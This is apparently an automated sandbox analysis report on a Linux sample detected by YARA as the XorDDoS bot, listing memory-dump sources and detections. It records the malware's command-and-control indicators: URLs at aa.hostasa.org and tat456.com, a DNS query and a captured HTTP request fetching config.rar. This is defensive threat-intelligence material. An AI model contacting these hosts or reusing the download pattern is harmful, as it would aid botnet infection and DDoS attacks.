                        Source: XZFWLZVF1Z, 5217.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5219.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5220.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5221.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5236.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5239.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5241.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5244.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5247.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5253.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5255.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5258.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5261.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5264.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5273.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5274.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5275.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5276.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5277.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5278.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5279.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5280.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5281.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5286.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5287.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5288.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5290.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5293.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5296.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5302.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5303.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5304.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5306.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5309.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5312.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5318.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5321.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5324.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5326.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5329.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5337.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5340.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5342.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5345.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5348.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5357.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5360.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5362.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5365.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5368.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5374.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5377.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5379.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5382.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5384.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5391.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5394.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5397.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5399.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5402.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5408.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5413.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5416.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5418.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5420.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5427.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5430.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5433.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5435.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5438.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5445.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5448.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5450.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5453.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5456.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5462.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5465.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5467.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5469.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5472.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5479.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5482.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5485.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5487.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5490.1.0000000057949c7e.00000000ef720726.rw-.sdmpString found in binary or memory: http://aa.hostasa.org/config.rar
                        Source: XZFWLZVF1Z, 5217.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5219.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5220.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5221.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5236.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5239.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5241.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5244.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5247.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5253.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5255.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5258.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5261.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5264.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5273.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5274.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5275.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5276.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5277.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5278.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5279.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5280.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5281.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5286.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5287.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5288.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5290.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5293.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5296.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5302.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5303.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5304.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5306.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5309.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5312.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5318.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5321.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5324.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5326.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5329.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5337.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5340.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5342.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5345.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5348.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5357.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5360.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5362.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5365.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5368.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5374.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5377.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5379.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5382.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5384.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5391.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5394.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5397.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5399.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5402.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5408.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5413.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5416.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5418.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5420.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5427.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5430.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5433.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5435.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5438.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5445.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5448.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5450.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5453.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5456.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5462.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5465.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5467.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5469.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5472.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5479.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5482.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5485.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5487.1.0000000057949c7e.00000000ef720726.rw-.sdmp, XZFWLZVF1Z, 5490.1.0000000057949c7e.00000000ef720726.rw-.sdmpString found in binary or memory: http://aa.hostasa.org/config.rartat456.com:1522
                        Source: XZFWLZVF1Z, vxnottgwjc.11.dr, lzqmjtjpqw.11.dr, wqgmxyrptd.11.dr, akxqlcphlm.11.dr, libudev.so.11.dr, xnntpqonav.11.dr, qkswzskzvm.11.dr, uprkxpaulc.11.dr, ppozyahgxh.11.dr, kexmeeeolw.11.dr, hhmykaposi.11.dr, ybfpvjxtlx.11.dr, zhoomtcmjp.11.dr, bingytdcwk.11.dr, mligukcpvp.11.drString found in binary or memory: http://www.gnu.org/software/libc/bugs.html
                        Source: unknownDNS traffic detected: queries for: aa.hostasa.org
                        Source: global trafficHTTP traffic detected: GET /config.rar HTTP/1.1Accept: */*Accept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)Host: aa.hostasa.orgConnection: Keep-Alive

                        DDoS:

                        barindex
                        Yara detected XorDDoS BotShow sources
                        Source: Yara matchFile source: XZFWLZVF1Z, type: SAMPLE
                        Source: Yara matchFile source: 5236.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5469.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5462.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5302.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5362.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5279.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5485.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5274.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5318.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5247.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5324.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5430.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5342.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5427.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5278.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5304.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5450.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5239.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5465.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5472.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5290.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5280.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5497.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5321.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5382.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5360.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5394.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5487.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5467.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5264.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5258.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5408.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5490.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5445.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5296.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5448.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5438.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5287.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5220.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5365.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5399.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5293.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5275.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5416.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5241.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5277.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5479.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5384.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5312.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5453.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5329.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5281.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5482.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5379.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5276.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5337.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5397.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5273.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5306.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5255.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5219.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5345.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5244.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5340.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5326.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5391.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5413.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5402.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5221.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5374.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5418.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5377.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5288.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5348.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5253.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5435.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5456.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5433.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5261.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5217.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5357.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5309.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5420.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5368.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5303.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5286.1.000000001a887bdc.0000000047f81f2f.r-x.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5217, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5219, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5220, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5221, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5236, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5239, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5241, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5244, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5247, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5253, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5255, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5258, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5261, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5264, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5273, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5274, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5275, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5276, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5277, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5278, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5279, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5280, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5281, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5286, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5287, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5288, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5290, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5293, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5296, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5302, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5303, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5304, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5306, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5309, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5312, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5318, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5321, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5324, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5326, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5329, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XZFWLZVF1Z PID: 5337, type: MEMORYSTR
